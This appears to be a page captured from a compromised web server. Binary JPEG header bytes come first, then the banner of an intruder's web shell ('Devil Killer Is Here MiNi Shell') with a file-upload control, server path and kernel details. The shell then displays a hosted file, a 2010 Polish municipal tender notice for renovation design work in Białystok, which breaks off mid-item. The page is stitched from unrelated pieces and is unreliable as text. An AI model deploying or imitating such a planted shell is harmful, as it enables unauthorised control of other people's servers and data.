JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100611/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100611/151277-N-2010.html

<p class="kh_header"><b>Białystok: Opracowanie dokumentacji projektowej na wykonanie prac remontowych              w budynkach ZMK zlokalizowanych  w Białymstoku.</b><br>
<b>Numer ogłoszenia: 151277 - 2010; data zamieszczenia: 11.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Mienia Komunalnego , ul. gen. J. Bema 89/1, 15-370 Białystok, woj. podlaskie, tel. 085 7479457, faks 085 7479483.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowej na wykonanie prac remontowych              w budynkach ZMK zlokalizowanych  w Białymstoku..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest: Opracowanie dokumentacji projektowej na wykonanie prac  remontowych w budynkach ZMK zlokalizowanych w Białymstoku.
Przedmiot zamówienia został podzielony na dziewięć zadań.
UWAGA: ZAMAWIAJĄCY DOPUSZCZA SKŁADANIE OFERT CZĘŚCIOWYCH  Z ZASTRZEŻENIEM, ZE JEDEN WYKONAWCA MOŻE ZŁOŻYĆ OFERTĘ MAKSYMALNIE NA CZTERY ZADANIA.
Zadanie I:  elewacji budynków mieszkalnych  usytuowanych przy ul. Suchowolca w obr. 21, ark. 18 ozn. w ewidencji gruntów nr 792/1 i 792/3,
Zadanie II: rozbiórki i odbudowy budynków gospodarczych usytuowanych przy ul. Suchowolca  w obr.21, ark.18 ozn. w ewidencji gruntów nr 792/1 i 792/3
Zadanie III: elewacji ceglanej budynku mieszkalnego przy ul. Sienkiewicza 26A,
Zadanie IV: audytu energetycznego i termomodernizacji budynku mieszkalnego przy ul. Niedźwiedziej 37,
Zadanie V: audytu energetycznego i termomodernizacja  budynku przychodni przy ul. Piłsudskiego 4a,
Zadanie VI: remontu korytarzy  i toalety z przystosowaniem dla osób niepełnosprawnych na I piętrze budynku przychodni przy ul. Piłsudskiego 4a,
Zadanie VII: dachu i wnętrz ogólnodostępnych tj. klatki schodowej, korytarzy, sanitariatów i dwóch pomieszczeń  na   I piętrze budynku  przy ul. Sienkiewicza 22, 
Zadanie VIII: przebudowy schodów wejścia głównego z montażem platformy przychodni lekarskiej przy ul.Bema 2,
Zadanie IX: zmiana sposobu użytkowania pomieszczeń w piwnicy budynku przy ul. Suraskiej 1.
-zgodnie z  opisem przedmiotu zamówienia stanowiącym zał. nr 1 do SIWZ.

2. Zakres prac obejmuje następujące elementy:
 Dokumentację projektową opracowaną zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno użytkowego (Dz. U. Nr 202, poz. 2072 z późn. zmianami) oraz zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 3 lipca 2003 w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. Nr 120, poz. 1133) wraz z opiniami, uzgodnieniami i pozwoleniami wymaganymi przepisami szczególnymi oraz z zasadami wiedzy technicznej.
3. Określa się wymaganą ilość egzemplarzy poszczególnych części dokumentacji:
a) Projekt budowlany wraz z projektem zagospodarowania terenu w celu zgłoszenia robót- po  4 egz.
b) Projekt wykonawczy  - po 4  egz.,
c) Przedmiary robót  - opracowany  zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno użytkowego (Dz. U. Nr 202 poz. 2072 z późn. zmianami,) wraz z opiniami, uzgodnieniami i pozwoleniami wymaganymi przepisami szczegółowymi - po 2 egz.,
d) Informacja do planu BIOZ - po  4 egz,
e) audyt energetyczny- po  4 egz.

f)Szczegółowe specyfikacje techniczne wykonania i odbioru robót budowlanych opracowane zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno użytkowego (Dz. U. Nr 202 poz. 2072 z późn. zmianami,) wraz z opiniami, uzgodnieniami i pozwoleniami wymaganymi przepisami szczegółowymi - po 2 egz.,,
g) Kosztorys inwestorski opracowany zgodnie z Rozporządzeniem Ministra Infrastruktury dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno - użytkowym (Dz. U. Nr 130 poz. 1389)  - po 2 egz.
h) pełną dokumentację w wersji elektronicznej  (bez kosztorysu inwestorskiego)- 
po 1 egz..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.22.10.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w celu potwierdzenia spełnienia warunku wykonawca winien przedłożyć wykaz wykonanych zamówień w okresie ostatnich 3 lat przed upływem terminu składania ofert w niniejszym postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie :
- co najmniej 2 zamówienia na wykonanie dokumentacji projektowej  na remont obiektów zabytkowych lub będących w strefie zabytkowej- przy składaniu oferty na zadania  I, II, III, V, VI, VII i IX  
- co najmniej 1 zamówienie na wykonanie dokumentacji projektowej  na remont obiektów zabytkowych lub będących w strefie zabytkowej i co najmniej 1 zamówienie na wykonanie remontu elewacji  ceglanej budynku - przy składaniu oferty na zadanie III,
-co najmniej 2 zamówienia na wykonanie dokumentacji projektowej na wykonanie audytu  energetycznego i termomodernizacji budynku - przy składaniu oferty na zadanie  IV

z podaniem wartości, przedmiotu, dat wykonania i odbiorców, z załączeniem dokumentu potwierdzającego, że prace zostały wykonane należycie;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w celu potwierdzenia spełnienia warunku wykonawca winien przedłożyć wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami 
- co najmniej 1 osobę posiadającej uprawnienia budowlane do projektowania bez ograniczeń w specjalności: konstrukcyjno-budowlanej, 
- co najmniej 1 osobę posiadającej uprawnienia budowlane do projektowania bez ograniczeń w specjalności: sanitarnej przy składaniu ofert na zadania w których występuje konieczność wykonania prac projektowych w tej branży.
- co najmniej 1 osobę posiadającej uprawnienia budowlane do projektowania  bez ograniczeń w specjalności: elektrycznej przy składaniu ofert na zadania w których występuje konieczność wykonania prac projektowych w tej branży.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia:
a) każdy wykonawca zobowiązany jest złożyć oddzielnie dokument określony w Rozdz.VI pkt.2 ppkt.2,
b) warunki dotyczące posiadania wiedzy i doświadczenia będą badane łącznie - dokumenty określone w Rozdz. VI pkt 1 ppkt 2, 3 i 4 powinien złożyć co najmniej jeden z wykonawców  wspólnie ubiegających  się o udzielenie zamówienia,
c) oświadczenie o spełnieniu warunków udziału w postępowaniu określone w Rozdz. VI pkt 1 ppkt 1 oraz oświadczenie o nie podleganiu wykluczeniu określone w Rozdz. VI pkt 2 ppkt 1 składa pełnomocnik wykonawców wspólnie ubiegających się o udzielenie zamówienia w ich imieniu bądź każdy z wykonawców oddzielnie.
2. Zgodnie z art. 26 ust 2b) i 2c) ustawy Pzp, wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>. Strony dopuszczają możliwość przedłużenia terminu wykonania przedmiotu umowy określonego w ust. 1 o czas opóźnienia, jeżeli takie opóźnienie jest lub będzie miało wpływ na wykonanie przedmiotu umowy w następujących przypadkach:
    1) wystąpienia konieczności wykonania dodatkowych i niemożliwych do przewidzenia prac, których zrealizowanie jest niezbędne z uwagi na zmianę obowiązujących przepisów lub treść uzyskanych warunków przyłączenia, a których przeprowadzenie wiąże się z potrzebą zmiany terminu,
    2) jakiegokolwiek opóźnienia, utrudnienia lub przeszkód spowodowanych przez lub dających się przypisać Zamawiającemu,
    3)  siły wyższej,
    4)  wydłużenie postępowania w sprawie wydawania decyzji administracyjnych,
    5)  wystąpienie innych szczególnych okoliczności, za które Wykonawca nie jest odpowiedzialny</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zmk.bialystok.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Mienia Komunalnego 15-370 Białystok ul.gen. J.Bema 89/1 pok. 111.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.06.2010 godzina 10:00, miejsce: Zarząd Mienia Komunalnego 15-370 Białystok ul.gen. J.Bema 89/1 Sekretariat -pok. 201.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Opracowanie dokumentacji projektowej na wykonanie elewacji  budynków mieszkalnych    przy    ul. Suchowolca w obr.21, ark.18 ozn.  w ewidencji gruntów nr 792/1 i 792/3 w Białymstoku..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE I        - opracowanie dokumentacji projektowej elewacji budynków mieszkalnych usytuowanych przy  ul. Suchowolca  w obr.21, ark. 18 ozn. w ewidencji gruntów  nr 792/1 i 792/ 3 wraz z uzyskaniem pozwolenia na budowę polegającej na: 
      -     uzupełnieniu odpadającego tynku,
-	pomalowaniu elewacji i kominów w kolorze białym,
-	naprawie obróbek,
-	naprawie podbitek,
-	uporządkowanie oprzewodowania istniejących instalacji elektroenergetycznych i teletechnicznych na elewacji budynku
-	 w przypadku konieczności ( na podstawie obliczeń i obowiązujących przepisów) zaprojektowanie instalacji odgromowej budynków
budynku nr 25 o pow. ogólnej 150,11 m2, kubaturze 618,70 m3
budynku nr 25A o pow. ogólnej 134,70 m2, kubaturze 639,20 m3
budynku nr 25B o pow. ogólnej 115,83 m2, kubaturze 559,00 m3
budynku nr 25C o pow. ogólnej 124,12 m2, kubaturze 592,30 m3
budynku nr 25D o pow. ogólnej 144,44 m2, kubaturze 700,90 m3
budynku nr 25E o pow. ogólnej 145,68 m2, kubaturze 689,20 m3
budynku nr 25A o pow. ogólnej 142,82 m2, kubaturze 715,40 m3
zgodnie z pozwoleniem konserwatora zabytków ( załącznik nr 1)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.22.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 50.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Opracowanie dokumentacji projektowej na wykonanie rozbiórki i odbudowy budynków gospodarczych przy ul. Suchowolca w obr.21, ark.18 ozn.  w ewidencji gruntów nr 792/1 i 792/3 w Białymstoku..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE II        - opracowanie dokumentacji projektowej budynków gospodarczych usytuowanych przy  ul. Suchowolca  w obr.21, ark. 18 ozn. w ewidencji gruntów  nr 792/1 i 792/3
1/   rozbiórki budynków gospodarczych:
nr 25-25A o powierzchni  użytkowej 112,10m2
nr 25B-25C o powierzchni  użytkowej 115,60m2
nr 25D-25E o powierzchni  użytkowej 110,20m2
nr 25 G o powierzchni  użytkowej 110,00m2
z  pozwoleniem na rozbiórkę.

2/  budowie budynków gospodarczych w miejscu rozebranych drewnianych lub stalowych z uzyskaniem pozwoleniem konserwatora zabytków i  pozwoleniem na budowę.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.22.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Opracowanie  dokumentacji   projektowej   na   wykonanie  remontu  elewacji  ceglanej budynku mieszkalnego przy ul. Sienkiewicza 26A w Białymstoku wraz z uzyskaniem pozwolenia na budowę..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE III   - opracowanie dokumentacji projektowej  na wykonanie remontu elewacji ceglanej budynku  mieszkalnego przy ul. Sienkiewicza 26A  na działce o nr geod. 1478/2 polegającej na : 
      -     uzupełnieniu ubytków cegły na ścianach, gzymsach i innych elem. dekoracyjnych
-	wykonaniu renowacji elewacji ceglanej, wymianie spoin, wykuciu i wymianie uszkodzonych cegieł i elementów zdobnych,
-	konserwacji stolarki drzwiowej,
-	wymianie stolarki okiennej na drewnianą z odtworzeniem istniejących podziałów i kolorystyki,
-	odtworzeniu balkonów z zachowaniem oryginalnych  wsporników,
-	wymianie podokienników zewnętrznych
-	uporządkowanie oprzewodowania istniejących instalacji elektroenergetycznych i teletechnicznych na elewacji budynku

zgodnie z wytycznymi konserwatora zabytków (  załącznik nr 2)
Podstawowe dane techniczne:
Kubatura:           1285m3
Pow.  zabudowy   103 m2
Budynek w podwórzu - z ulicy wjazd bramą.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.22.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Opracowanie dokumentacji projektowej na wykonanie audytu energetycznego termomodernizacji budynku mieszkalnego przy   ul.  Niedźwiedziej 37 w Białymstoku..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE IV   - opracowanie dokumentacji projektowej na wykonanie audytu energetycznego i  termomodernizacji budynku mieszalnego przy ul. Niedźwiedziej 37 w Białymstoku ( na zgłoszenie) obejmującej:
-	ocieplenie ścian zewnętrznych piwnic budynku warstwą izolacji termicznej, tynk mozaikowy o uziarnieniu 1,50mm.
-	ocieplenie ścian podłużnych zewnętrznych części nadziemnej budynku warstwą izolacji termicznej, tynk baranek o uziarnieniu 2,00mm,
-	remont obróbek blacharskich
-	wymiana podokienników zewnętrznych
-	modernizacja wejść do budynku (daszki, schody, balustrady ),
-	uporządkowanie oprzewodowania istniejących instalacji elektroenergetycznych ( w tym WLZ) i teletechnicznych na elewacji budynku
-	w przypadku konieczności ( na podstawie obliczeń i obowiązujących przepisów) zaprojektowanie instalacji odgromowej budynku
Podstawowe dane techniczne obiektu:
Kubatura:           1872 m3
Pow.  zabudowy   234 m2
Teren ogrodzony..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.22.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Opracowanie dokumentacji projektowej na wykonanie audytu energetycznego i termomodernizacji budynku przychodni przy ul. Piłsudskiego 4a w Białymstoku..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE V  -  opracowanie dokumentacji projektowej na modernizację  podjazdów, audytu energetycznego i termomodernizacji budynku przychodni przy ul. Piłsudskiego 4a w Białymstoku wraz z pozwoleniem na budowę na działce 1254/1 obejmującej:
-	naprawę murków oporowych i przebudowę nawierzchni podjazdów ( w części 
   z lastryko oznaczonej na rzucie parteru będącym załącznikiem nr 3,
